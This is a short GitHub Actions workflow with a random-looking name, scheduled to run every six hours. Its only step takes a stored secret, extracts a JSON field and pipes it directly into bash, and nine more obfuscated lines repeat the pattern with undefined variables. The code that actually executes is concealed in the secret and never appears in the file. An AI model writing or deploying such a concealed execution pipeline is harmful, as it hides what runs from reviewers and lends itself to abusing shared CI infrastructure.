name: mengtianfeng9876
on:
  workflow_dispatch:
  schedule:
    - cron: '12 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: mengtianfeng9876
        env:
          wz81: ${{ secrets.wz81 }}
        run: |
          echo $wz81 | jq -r .nrg52 | /bin/bash
          echo $dl7889 | jq -r .ry30 | /bin/bash
          echo $oenco72322 | jq -r .ytb64203 | /bin/bash
          echo $v4 | jq -r .d8575 | /bin/bash
          echo $qkm15875 | jq -r .ilq7 | /bin/bash
          echo $zduvo53656 | jq -r .qo56759 | /bin/bash
          echo $pwzc82 | jq -r .ydbdn08083 | /bin/bash
          echo $nzdta9848 | jq -r .hem97676 | /bin/bash
          echo $avgrk52377 | jq -r .dbq78 | /bin/bash
          echo $ks7610 | jq -r .c81642 | /bin/bash

